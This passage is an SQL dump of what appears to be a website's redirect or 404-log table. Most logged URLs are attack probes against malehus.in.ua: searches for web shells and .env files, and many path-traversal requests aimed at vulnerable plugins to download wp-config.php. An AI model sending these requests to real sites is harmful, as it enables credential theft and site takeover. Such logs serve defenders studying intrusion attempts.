16:39:50','0000-00-00 00:00:00',301),(36544,'https://malehus.in.ua/cindex.php',NULL,'anonymousfox.co','',6,0,'2021-09-29 16:39:53','0000-00-00 00:00:00',301),(36545,'https://malehus.in.ua/wp-content/wp-1ogin_bak.php',NULL,'anonymousfox.co','',6,0,'2021-09-29 16:39:59','0000-00-00 00:00:00',301),(36546,'https://malehus.in.ua/wp-1ogin_bak.php',NULL,'anonymousfox.co','',6,0,'2021-09-29 16:40:04','0000-00-00 00:00:00',301),(36547,'https://malehus.in.ua/wp-includes/fonts/css.php',NULL,'anonymousfox.co','',6,0,'2021-09-29 16:40:11','0000-00-00 00:00:00',301),(36548,'https://malehus.in.ua/wp-includes/css/css.php',NULL,'anonymousfox.co','',23,0,'2021-09-29 16:40:14','0000-00-00 00:00:00',301),(36549,'https://malehus.in.ua/old-index.php',NULL,'anonymousfox.co','',25,0,'2021-09-29 16:40:19','0000-00-00 00:00:00',301),(36550,'https://malehus.in.ua/config.bak.php',NULL,'anonymousfox.co','',22,0,'2021-09-29 16:40:24','0000-00-00 00:00:00',301),(36551,'https://malehus.in.ua/wp-admin/config.bak.php',NULL,'anonymousfox.co','',4,0,'2021-09-29 16:40:27','0000-00-00 00:00:00',301),(36552,'https://malehus.in.ua/wp-content/config.bak.php',NULL,'anonymousfox.co','',5,0,'2021-09-29 16:40:30','0000-00-00 00:00:00',301),(36553,'https://malehus.in.ua/wp-includes/config.bak.php',NULL,'anonymousfox.co','',5,0,'2021-09-29 16:40:33','0000-00-00 00:00:00',301),(36554,'https://malehus.in.ua/wp-content/themes/config.bak.php',NULL,'anonymousfox.co','',21,0,'2021-09-29 16:40:37','0000-00-00 00:00:00',301),(36555,'https://malehus.in.ua/wp-content/plugins/config.bak.php',NULL,'anonymousfox.co','',5,0,'2021-09-29 16:40:40','0000-00-00 00:00:00',301),(36556,'https://malehus.in.ua/wp-includes/css/wp-config.php',NULL,'anonymousfox.co','',21,0,'2021-09-29 16:40:42','0000-00-00 00:00:00',301),(36557,'https://malehus.in.ua/wp-content/plugins/ubh/up.php',NULL,'anonymousfox.co','',21,0,'2021-09-29 16:40:46','0000-00-00 00:00:00',301),(36558,'https://malehus.in.ua/wp-includes/wpconfig.bak.php?act=sf',NULL,'anonymousfox.co','',5,0,'2021-09-29 16:40:48','0000-00-00 00:00:00',301),(36559,'https://malehus.in.ua/wp-content/plugins/wpconfig.bak.php?act=sf',NULL,'anonymousfox.co','',21,0,'2021-09-29 16:40:52','0000-00-00 00:00:00',301),(36560,'https://malehus.in.ua/haders.php',NULL,'anonymousfox.co','',5,0,'2021-09-29 16:40:56','0000-00-00 00:00:00',301),(36561,'https://malehus.in.ua/wp-content/wp-old-index.php?action=login&pass=-1&submit=',NULL,'anonymousfox.co','',5,0,'2021-09-29 16:40:59','0000-00-00 00:00:00',301),(36562,'https://malehus.in.ua/legion.php',NULL,'anonymousfox.co','',23,0,'2021-09-29 16:41:03','0000-00-00 00:00:00',301),(36563,'https://malehus.in.ua/wp-content/mu-plugins/db-safe-mode.php',NULL,'anonymousfox.co','',22,0,'2021-09-29 16:41:05','0000-00-00 00:00:00',301),(36564,'https://malehus.in.ua/wp-includes/lfx.php',NULL,'anonymousfox.co','',6,0,'2021-09-29 16:41:16','0000-00-00 00:00:00',301),(36565,'https://malehus.in.ua/wp-includes/small.php',NULL,'anonymousfox.co','',6,0,'2021-09-29 16:41:18','0000-00-00 00:00:00',301),(36566,'https://malehus.in.ua/up.php',NULL,'anonymousfox.co','',40,0,'2021-09-29 16:41:23','0000-00-00 00:00:00',301),(36567,'https://malehus.in.ua/upload.php',NULL,'anonymousfox.co','',30,0,'2021-09-29 16:41:26','0000-00-00 00:00:00',301),(36568,'https://malehus.in.ua/config.php',NULL,'anonymousfox.co','',22,0,'2021-09-29 16:41:29','0000-00-00 00:00:00',301),(36569,'https://malehus.in.ua/test.php?ghost=send',NULL,'anonymousfox.co','',2,0,'2021-09-29 16:41:34','0000-00-00 00:00:00',301),(36570,'https://malehus.in.ua/wp-content/langar.php',NULL,'anonymousfox.co','',6,0,'2021-09-29 16:41:37','0000-00-00 00:00:00',301),(36571,'https://malehus.in.ua/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'anonymousfox.co','',33,0,'2021-09-29 16:41:38','0000-00-00 00:00:00',301),(36572,'https://malehus.in.ua/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php',NULL,'anonymousfox.co','',6,0,'2021-09-29 16:41:42','0000-00-00 00:00:00',301),(36573,'https://malehus.in.ua/wp-content/plugins/wpdiscuz/themes/default/style-rtl.css',NULL,'anonymousfox.co','',6,0,'2021-09-29 16:41:44','0000-00-00 00:00:00',301),(36574,'https://malehus.in.ua/restapi.php',NULL,'','',3,0,'2021-09-30 07:17:08','0000-00-00 00:00:00',301),(36575,'https://www.malehus.in.ua/restapi.php',NULL,'','',3,0,'2021-09-30 07:17:10','0000-00-00 00:00:00',301),(36576,'https://www.malehus.in.ua/gate.php',NULL,'','',2,0,'2021-09-30 07:17:11','0000-00-00 00:00:00',301),(36577,'https://malehus.in.ua/gate.php',NULL,'','',2,0,'2021-09-30 07:18:32','0000-00-00 00:00:00',301),(36578,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/0053333.gif',NULL,'','',2,0,'2021-09-30 11:15:31','0000-00-00 00:00:00',301),(36579,'https://malehus.in.ua/uploads/up.php',NULL,'','',12,0,'2021-10-05 20:01:31','0000-00-00 00:00:00',301),(36580,'https://malehus.in.ua/sites/all/libraries/elfinder/elfinder.php.html',NULL,'','',2,0,'2021-10-05 20:01:51','0000-00-00 00:00:00',301),(36581,'https://malehus.in.ua/ups.php',NULL,'','',32,0,'2021-10-05 20:02:31','0000-00-00 00:00:00',301),(36582,'https://malehus.in.ua/wp-content/upload.php',NULL,'','',2,0,'2021-10-05 20:03:54','0000-00-00 00:00:00',301),(36583,'https://malehus.in.ua/wp-admin/css/',NULL,'binance.com','',42,0,'2021-10-11 18:31:55','0000-00-00 00:00:00',301),(36584,'https://malehus.in.ua/sites/default/files/',NULL,'binance.com','',41,0,'2021-10-11 18:32:09','0000-00-00 00:00:00',301),(36585,'https://malehus.in.ua/admin/controller/extension/extension/',NULL,'binance.com','',41,0,'2021-10-11 18:32:16','0000-00-00 00:00:00',301),(36586,'https://malehus.in.ua/uploads/',NULL,'binance.com','',41,0,'2021-10-11 18:32:23','0000-00-00 00:00:00',301),(36587,'https://malehus.in.ua/files/',NULL,'binance.com','',41,0,'2021-10-11 18:32:38','0000-00-00 00:00:00',301),(36588,'https://malehus.in.ua/wp-admin',NULL,'','',2,0,'2021-10-11 21:38:13','0000-00-00 00:00:00',301),(36589,'https://malehus.in.ua/wp',NULL,'','',40,0,'2021-10-11 21:38:14','0000-00-00 00:00:00',301),(36590,'https://malehus.in.ua/old',NULL,'','',32,0,'2021-10-11 21:38:15','0000-00-00 00:00:00',301),(36591,'https://malehus.in.ua/newsite',NULL,'','',3,0,'2021-10-11 21:38:15','0000-00-00 00:00:00',301),(36592,'https://malehus.in.ua/test',NULL,'','',17,0,'2021-10-11 21:38:15','0000-00-00 00:00:00',301),(36593,'https://malehus.in.ua/cms',NULL,'','',3,0,'2021-10-11 21:38:16','0000-00-00 00:00:00',301),(36594,'https://malehus.in.ua/dev',NULL,'','',4,0,'2021-10-11 21:38:16','0000-00-00 00:00:00',301),(36595,'https://malehus.in.ua/backup',NULL,'','',34,0,'2021-10-11 21:38:17','0000-00-00 00:00:00',301),(36596,'https://malehus.in.ua/protal',NULL,'','',2,0,'2021-10-11 21:38:17','0000-00-00 00:00:00',301),(36597,'https://malehus.in.ua/vendor/.env',NULL,'','',6,0,'2021-10-14 15:41:34','0000-00-00 00:00:00',301),(36598,'https://malehus.in.ua/storage/.env',NULL,'','',23,0,'2021-10-14 15:41:35','0000-00-00 00:00:00',301),(36599,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/unnamed.jpg',NULL,'','',2,0,'2021-10-21 17:17:25','0000-00-00 00:00:00',301),(36600,'https://malehus.in.ua/security.txt',NULL,'','',3,0,'2021-10-22 16:08:23','0000-00-00 00:00:00',301),(36601,'https://malehus.in.ua/attachments/article/2474/dox 8 m 2020.xls',NULL,'','',3,0,'2021-10-27 02:32:19','0000-00-00 00:00:00',301),(36602,'https://malehus.in.ua/sitemap.xml',NULL,'','',15,0,'2021-11-03 10:43:17','0000-00-00 00:00:00',301),(36603,'https://malehus.in.ua/api/.env',NULL,'','',30,0,'2021-11-12 11:09:44','0000-00-00 00:00:00',301),(36604,'https://malehus.in.ua/application/.env',NULL,'','',27,0,'2021-11-12 11:09:45','0000-00-00 00:00:00',301),(36605,'https://malehus.in.ua/app-ads.txt',NULL,'','',11,0,'2021-11-23 00:46:13','0000-00-00 00:00:00',301),(36606,'https://malehus.in.ua/typo3conf/ext/hi_surveystats/res/php-ofc-library/ofc_upload_image.php',NULL,'','',2,0,'2021-11-24 10:37:11','0000-00-00 00:00:00',301),(36607,'https://malehus.in.ua/chart/php-ofc-library/ofc_upload_image.php',NULL,'','',2,0,'2021-11-26 03:47:12','0000-00-00 00:00:00',301),(36608,'https://malehus.in.ua/ofc/php-ofc-library/ofc_upload_image.php',NULL,'','',2,0,'2021-11-27 14:32:44','0000-00-00 00:00:00',301),(36609,'https://malehus.in.ua/wordpress',NULL,'http://malehus.in.ua/wordpress','',39,0,'2021-11-27 21:35:37','0000-00-00 00:00:00',301),(36610,'https://malehus.in.ua/oldsite',NULL,'http://malehus.in.ua/oldsite','',5,0,'2021-11-27 21:35:42','0000-00-00 00:00:00',301),(36611,'https://malehus.in.ua/new',NULL,'http://malehus.in.ua/new','',38,0,'2021-11-27 21:35:43','0000-00-00 00:00:00',301),(36612,'https://malehus.in.ua/wp-old',NULL,'http://malehus.in.ua/wp-old','',5,0,'2021-11-27 21:35:44','0000-00-00 00:00:00',301),(36613,'https://malehus.in.ua/2020',NULL,'http://malehus.in.ua/2020','',9,0,'2021-11-27 21:35:45','0000-00-00 00:00:00',301),(36614,'https://malehus.in.ua/2019',NULL,'http://malehus.in.ua/2019','',9,0,'2021-11-27 21:35:46','0000-00-00 00:00:00',301),(36615,'https://malehus.in.ua/2018',NULL,'http://malehus.in.ua/2018','',9,0,'2021-11-27 21:35:47','0000-00-00 00:00:00',301),(36616,'https://malehus.in.ua/project',NULL,'http://malehus.in.ua/project','',2,0,'2021-11-27 21:35:49','0000-00-00 00:00:00',301),(36617,'https://malehus.in.ua/demo',NULL,'http://malehus.in.ua/demo','',17,0,'2021-11-27 21:35:50','0000-00-00 00:00:00',301),(36618,'https://malehus.in.ua/bc',NULL,'http://malehus.in.ua/bc','',19,0,'2021-11-27 21:35:51','0000-00-00 00:00:00',301),(36619,'https://malehus.in.ua/www',NULL,'http://malehus.in.ua/www','',5,0,'2021-11-27 21:35:52','0000-00-00 00:00:00',301),(36620,'https://malehus.in.ua/2021',NULL,'http://malehus.in.ua/2021','',5,0,'2021-11-27 21:35:53','0000-00-00 00:00:00',301),(36621,'https://malehus.in.ua/newfolder',NULL,'http://malehus.in.ua/newfolder','',2,0,'2021-11-27 21:35:53','0000-00-00 00:00:00',301),(36622,'https://malehus.in.ua/main',NULL,'http://malehus.in.ua/main','',26,0,'2021-11-27 21:35:54','0000-00-00 00:00:00',301),(36623,'https://malehus.in.ua/old-site',NULL,'http://malehus.in.ua/old-site','',5,0,'2021-11-27 21:35:55','0000-00-00 00:00:00',301),(36624,'https://malehus.in.ua/bk',NULL,'http://malehus.in.ua/bk','',19,0,'2021-11-27 21:35:55','0000-00-00 00:00:00',301),(36625,'https://malehus.in.ua/bak',NULL,'http://malehus.in.ua/bak','',5,0,'2021-11-27 21:35:56','0000-00-00 00:00:00',301),(36626,'https://malehus.in.ua/bac',NULL,'http://malehus.in.ua/bac','',5,0,'2021-11-27 21:35:57','0000-00-00 00:00:00',301),(36627,'https://malehus.in.ua/site',NULL,'http://malehus.in.ua/site','',9,0,'2021-11-27 21:35:57','0000-00-00 00:00:00',301),(36628,'https://malehus.in.ua/admin/php-ofc-library/ofc_upload_image.php',NULL,'','',2,0,'2021-11-29 05:33:04','0000-00-00 00:00:00',301),(36629,'https://malehus.in.ua/php-ofc-library/ofc_upload_image.php',NULL,'','',2,0,'2021-12-01 17:48:22','0000-00-00 00:00:00',301),(36630,'https://malehus.in.ua/wp2',NULL,'http://malehus.in.ua/wp2','',3,0,'2021-12-02 06:25:03','0000-00-00 00:00:00',301),(36631,'https://malehus.in.ua/sitio',NULL,'http://malehus.in.ua/sitio','',3,0,'2021-12-02 06:25:13','0000-00-00 00:00:00',301),(36632,'https://malehus.in.ua/sito',NULL,'http://malehus.in.ua/sito','',3,0,'2021-12-02 06:25:14','0000-00-00 00:00:00',301),(36633,'https://malehus.in.ua/libraries/gnz11/assets/js/plugins/jquery/file_upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2021-12-06 02:24:29','0000-00-00 00:00:00',301),(36634,'https://malehus.in.ua/libraries/gnz11/assets/js/plugins/jquery/file_upload/server/php/index_upl.php?file=tf2rghf.jpg',NULL,'','',1,0,'2021-12-06 02:24:29','0000-00-00 00:00:00',301),(36635,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/pokrova.jpg',NULL,'','',1,0,'2021-12-07 23:31:27','0000-00-00 00:00:00',301),(36636,'https://malehus.in.ua/sites/all/libraries/plupload/examples/upload.php',NULL,'','',3,0,'2021-12-14 20:43:35','0000-00-00 00:00:00',301),(36637,'https://malehus.in.ua/index.php?option=com_fabrik&c=import&view=import',NULL,'','',2,0,'2021-12-19 02:33:07','0000-00-00 00:00:00',301),(36638,'https://malehus.in.ua/modules/mod_artuploader/upload.php',NULL,'','',1,0,'2021-12-19 02:33:14','0000-00-00 00:00:00',301),(36639,'https://malehus.in.ua/components/com_supergroups/uploadvideo/upload.php',NULL,'','',1,0,'2021-12-19 09:17:30','0000-00-00 00:00:00',301),(36640,'https://malehus.in.ua/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php',NULL,'','',3,0,'2021-12-19 13:50:35','0000-00-00 00:00:00',301),(36641,'https://malehus.in.ua/wp-content/plugins/superlogoshowcase-wp/sls-wp-admin/pages/import.php',NULL,'','',3,0,'2021-12-19 13:50:37','0000-00-00 00:00:00',301),(36642,'https://malehus.in.ua/wp-content/plugins/super-interactive-maps/sim-wp-admin/pages/import.php',NULL,'','',3,0,'2021-12-19 13:50:38','0000-00-00 00:00:00',301),(36643,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/timox1.jpg',NULL,'','',1,0,'2021-12-21 13:36:07','0000-00-00 00:00:00',301),(36644,'https://malehus.in.ua/components/com_blog_calendar/controller.php',NULL,'','',1,0,'2021-12-21 22:21:17','0000-00-00 00:00:00',301),(36645,'https://malehus.in.ua/ckeditor/config.js',NULL,'','',1,0,'2021-12-22 07:58:45','0000-00-00 00:00:00',301),(36646,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/vybory.jpg',NULL,'','',1,0,'2021-12-24 01:11:59','0000-00-00 00:00:00',301),(36647,'https://malehus.in.ua/components/com_fabrik/controller.php',NULL,'','',2,0,'2021-12-24 05:09:01','0000-00-00 00:00:00',301),(36648,'https://malehus.in.ua/public/assets/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2021-12-24 18:59:38','0000-00-00 00:00:00',301),(36649,'https://malehus.in.ua/admin/view/javascript/common.js',NULL,'','',1,0,'2021-12-25 10:33:47','0000-00-00 00:00:00',301),(36650,'https://malehus.in.ua/wp-includes/wlwmanifest.xml',NULL,'','',94,0,'2021-12-25 10:33:49','0000-00-00 00:00:00',301),(36651,'https://malehus.in.ua/components/com_chronocontact/libraries/chronoform.php',NULL,'','',1,0,'2021-12-25 23:13:12','0000-00-00 00:00:00',301),(36652,'https://malehus.in.ua/public/assets/global/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2021-12-26 16:19:10','0000-00-00 00:00:00',301),(36653,'https://malehus.in.ua/components/com_dtregister/controller.php',NULL,'','',1,0,'2021-12-27 04:51:56','0000-00-00 00:00:00',301),(36654,'https://malehus.in.ua/public/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2021-12-28 07:33:33','0000-00-00 00:00:00',301),(36655,'https://malehus.in.ua/components/com_hwdvideoshare/controller.php',NULL,'','',1,0,'2021-12-28 08:43:25','0000-00-00 00:00:00',301),(36656,'https://malehus.in.ua/wp-content/themes/sketch/content-sample.php',NULL,'','',1,0,'2021-12-28 19:58:32','0000-00-00 00:00:00',301),(36657,'https://malehus.in.ua/wp/wp-content/themes/sketch/content-sample.php',NULL,'','',1,0,'2021-12-28 19:58:33','0000-00-00 00:00:00',301),(36658,'https://malehus.in.ua/wordpress/wp-content/themes/sketch/content-sample.php',NULL,'','',1,0,'2021-12-28 19:58:39','0000-00-00 00:00:00',301),(36659,'https://malehus.in.ua/blog/wp-content/themes/sketch/content-sample.php',NULL,'','',1,0,'2021-12-28 19:58:40','0000-00-00 00:00:00',301),(36660,'https://malehus.in.ua/site/wp-content/themes/sketch/content-sample.php',NULL,'','',1,0,'2021-12-28 19:58:42','0000-00-00 00:00:00',301),(36661,'https://malehus.in.ua/wp-load.php?daksldlkdsadas=1',NULL,'','',1,0,'2021-12-29 05:14:43','0000-00-00 00:00:00',301),(36662,'https://malehus.in.ua/conf/.env',NULL,'','',1,0,'2021-12-29 08:57:44','0000-00-00 00:00:00',301),(36663,'https://malehus.in.ua/wp-content/.env',NULL,'','',1,0,'2021-12-29 08:57:45','0000-00-00 00:00:00',301),(36664,'https://malehus.in.ua/wp-admin/.env',NULL,'','',1,0,'2021-12-29 08:57:46','0000-00-00 00:00:00',301),(36665,'https://malehus.in.ua/library/.env',NULL,'','',1,0,'2021-12-29 08:57:47','0000-00-00 00:00:00',301),(36666,'https://malehus.in.ua/new/.env',NULL,'','',3,0,'2021-12-29 08:57:47','0000-00-00 00:00:00',301),(36667,'https://malehus.in.ua/old/.env',NULL,'','',22,0,'2021-12-29 08:57:49','0000-00-00 00:00:00',301),(36668,'https://malehus.in.ua/js/ckeditor/ckupload.php',NULL,'','',1,0,'2021-12-29 14:02:17','0000-00-00 00:00:00',301),(36669,'https://malehus.in.ua/components/com_jombib/jombib.html.php',NULL,'','',1,0,'2021-12-30 04:29:30','0000-00-00 00:00:00',301),(36670,'https://malehus.in.ua/ckupload.php',NULL,'','',1,0,'2021-12-30 09:31:35','0000-00-00 00:00:00',301),(36671,'https://malehus.in.ua/demo/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2021-12-30 10:59:36','0000-00-00 00:00:00',301),(36672,'https://malehus.in.ua/admin/ckupload.php',NULL,'','',1,0,'2021-12-30 14:05:46','0000-00-00 00:00:00',301),(36673,'https://malehus.in.ua/mt/',NULL,'','',1,0,'2022-01-01 02:26:34','0000-00-00 00:00:00',301),(36674,'https://malehus.in.ua/alfa_data/alfacgiapi/',NULL,'','',1,0,'2022-01-01 02:26:35','0000-00-00 00:00:00',301),(36675,'https://malehus.in.ua/wp-content/uploads/2021/12/up.php',NULL,'','',1,0,'2022-01-01 02:26:38','0000-00-00 00:00:00',301),(36676,'https://malehus.in.ua/wp-content/alfa_data/alfacgiapi/',NULL,'','',1,0,'2022-01-01 02:26:40','0000-00-00 00:00:00',301),(36677,'https://malehus.in.ua/doc.php',NULL,'','',34,0,'2022-01-01 02:26:41','0000-00-00 00:00:00',301),(36678,'https://malehus.in.ua/shells.php',NULL,'','',16,0,'2022-01-01 02:26:43','0000-00-00 00:00:00',301),(36679,'https://malehus.in.ua/about.php',NULL,'','',30,0,'2022-01-01 02:26:44','0000-00-00 00:00:00',301),(36680,'https://malehus.in.ua/wp-admin/alfa.php',NULL,'','',1,0,'2022-01-01 02:26:45','0000-00-00 00:00:00',301),(36681,'https://malehus.in.ua/wp-includes/fw.php',NULL,'','',3,0,'2022-01-01 02:26:49','0000-00-00 00:00:00',301),(36682,'https://malehus.in.ua/wp-content/fw.php',NULL,'','',13,0,'2022-01-01 02:26:50','0000-00-00 00:00:00',301),(36683,'https://malehus.in.ua/wp-admin/fw.php',NULL,'','',11,0,'2022-01-01 02:26:52','0000-00-00 00:00:00',301),(36684,'https://malehus.in.ua/wp-content/uploads/2021/12/fw.php',NULL,'','',1,0,'2022-01-01 02:26:53','0000-00-00 00:00:00',301),(36685,'https://malehus.in.ua/wp-includes/wso.php',NULL,'','',1,0,'2022-01-01 02:26:54','0000-00-00 00:00:00',301),(36686,'https://malehus.in.ua/wp-content/wso.php',NULL,'','',3,0,'2022-01-01 02:26:56','0000-00-00 00:00:00',301),(36687,'https://malehus.in.ua/wp-admin/wso.php',NULL,'','',1,0,'2022-01-01 02:26:57','0000-00-00 00:00:00',301),(36688,'https://malehus.in.ua/wp-22.php',NULL,'','',5,0,'2022-01-01 02:26:59','0000-00-00 00:00:00',301),(36689,'https://malehus.in.ua/fw.php',NULL,'','',21,0,'2022-01-01 02:27:02','0000-00-00 00:00:00',301),(36690,'https://malehus.in.ua/shell.php',NULL,'','',37,0,'2022-01-01 02:27:04','0000-00-00 00:00:00',301),(36691,'https://malehus.in.ua/administrator/images/stories/photo_2022-01-04_14-12-21.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2022-01-04 12:17:04','0000-00-00 00:00:00',301),(36692,'https://malehus.in.ua/administrator/images/stories/photo_2022-01-04_14-12-26.jpg',NULL,'https://malehus.in.ua/administrator/index.php?option=com_content&view=article&layout=edit','',1,0,'2022-01-04 12:17:25','0000-00-00 00:00:00',301),(36693,'https://malehus.in.ua/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-01-05 19:23:53','0000-00-00 00:00:00',301),(36694,'https://malehus.in.ua/sphinx.conf',NULL,'','',1,0,'2022-01-06 10:30:22','0000-00-00 00:00:00',301),(36695,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/img_20210418_172952_tigr.jpg',NULL,'','',2,0,'2022-01-07 02:02:06','0000-00-00 00:00:00',301),(36696,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/gpost_20200903_00080.jpg',NULL,'','',2,0,'2022-01-07 02:08:48','0000-00-00 00:00:00',301),(36697,'https://malehus.in.ua/file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-01-07 12:18:07','0000-00-00 00:00:00',301),(36698,'https://malehus.in.ua/wp-config.php',NULL,'','',1,0,'2022-01-16 03:12:48','0000-00-00 00:00:00',301),(36699,'https://malehus.in.ua/wp-config.txt',NULL,'','',3,0,'2022-01-16 03:12:50','0000-00-00 00:00:00',301),(36700,'https://malehus.in.ua/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php',NULL,'','',1,0,'2022-01-16 03:12:51','0000-00-00 00:00:00',301),(36701,'https://malehus.in.ua/wp-admin/admin-ajax.php?action=ave_publishpost&title=random&short=1&term=1&thumb=../wp-config.php',NULL,'','',1,0,'2022-01-16 03:12:51','0000-00-00 00:00:00',301),(36702,'https://malehus.in.ua/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php',NULL,'','',1,0,'2022-01-16 03:12:52','0000-00-00 00:00:00',301),(36703,'https://malehus.in.ua/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php',NULL,'','',1,0,'2022-01-16 03:12:54','0000-00-00 00:00:00',301),(36704,'https://malehus.in.ua/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes',NULL,'','',1,0,'2022-01-16 03:12:54','0000-00-00 00:00:00',301),(36705,'https://malehus.in.ua/wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=../../../../../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:12:55','0000-00-00 00:00:00',301),(36706,'https://malehus.in.ua/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:12:56','0000-00-00 00:00:00',301),(36707,'https://malehus.in.ua/wp-content/force-download.php?file=../wp-config.php',NULL,'','',1,0,'2022-01-16 03:12:56','0000-00-00 00:00:00',301),(36708,'https://malehus.in.ua/force-download.php?file=wp-config.php',NULL,'','',1,0,'2022-01-16 03:12:57','0000-00-00 00:00:00',301),(36709,'https://malehus.in.ua/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:12:58','0000-00-00 00:00:00',301),(36710,'https://malehus.in.ua/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:12:59','0000-00-00 00:00:00',301),(36711,'https://malehus.in.ua/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:13:00','0000-00-00 00:00:00',301),(36712,'https://malehus.in.ua/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:13:00','0000-00-00 00:00:00',301),(36713,'https://malehus.in.ua/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?mypath=../../../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:13:01','0000-00-00 00:00:00',301),(36714,'https://malehus.in.ua/wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:13:02','0000-00-00 00:00:00',301),(36715,'https://malehus.in.ua/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:13:03','0000-00-00 00:00:00',301),(36716,'https://malehus.in.ua/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:13:04','0000-00-00 00:00:00',301),(36717,'https://malehus.in.ua/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:13:05','0000-00-00 00:00:00',301),(36718,'https://malehus.in.ua/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:13:06','0000-00-00 00:00:00',301),(36719,'https://malehus.in.ua/wp-content/themes/nativechurch/download/download.php?file=../../../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:13:07','0000-00-00 00:00:00',301),(36720,'https://malehus.in.ua/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadattachment.php?path=../../../../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:13:08','0000-00-00 00:00:00',301),(36721,'https://malehus.in.ua/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:13:09','0000-00-00 00:00:00',301),(36722,'https://malehus.in.ua/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:13:09','0000-00-00 00:00:00',301),(36723,'https://malehus.in.ua/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:13:10','0000-00-00 00:00:00',301),(36724,'https://malehus.in.ua/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download',NULL,'','',1,0,'2022-01-16 03:13:11','0000-00-00 00:00:00',301),(36725,'https://malehus.in.ua/wp-content/themes/fiestaresidences/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:13:12','0000-00-00 00:00:00',301),(36726,'https://malehus.in.ua/wp-content/themes/erinvale/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:13:13','0000-00-00 00:00:00',301),(36727,'https://malehus.in.ua/wp-content/themes/hsv/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:13:14','0000-00-00 00:00:00',301),(36728,'https://malehus.in.ua/wp-content/themes/optimus/download.php?file=../../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:13:15','0000-00-00 00:00:00',301),(36729,'https://malehus.in.ua/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php',NULL,'','',1,0,'2022-01-16 03:13:16','0000-00-00 00:00:00',301),(36730,'https://malehus.in.ua/wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php',NULL,'','',1,0,'2022-01-16 03:13:17','0000-00-00 00:00:00',301),(36731,'https://malehus.in.ua/8-novini-2/2537-vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-11-misyatsiv-2021-roku',NULL,'','',17,0,'2022-01-18 07:55:37','0000-00-00 00:00:00',301),(36732,'https://malehus.in.ua/https:/malehus.in.ua/images/stories/photo_2022-01-04_14-12-21.jpg',NULL,'','',1,0,'2022-01-22 08:00:01','0000-00-00 00:00:00',301),(36733,'https://malehus.in.ua/tiny_mce/plugins/tinybrowser/tinybrowser.php',NULL,'','',1,0,'2022-01-24 10:42:23','0000-00-00 00:00:00',301),(36734,'https://malehus.in.ua/admin/includes/javascript/tiny_mce/plugins/tinybrowser/tinybrowser.php',NULL,'','',1,0,'2022-01-24 14:01:55','0000-00-00 00:00:00',301),(36735,'https://malehus.in.ua/index.php?option=com_arttcym&ctrl=frontmails&task=setnewiconshare',NULL,'','',1,0,'2022-01-26 07:58:56','0000-00-00 00:00:00',301),(36736,'https://malehus.in.ua/media/com_acym/upload/socials/',NULL,'','',1,0,'2022-01-26 12:04:57','0000-00-00 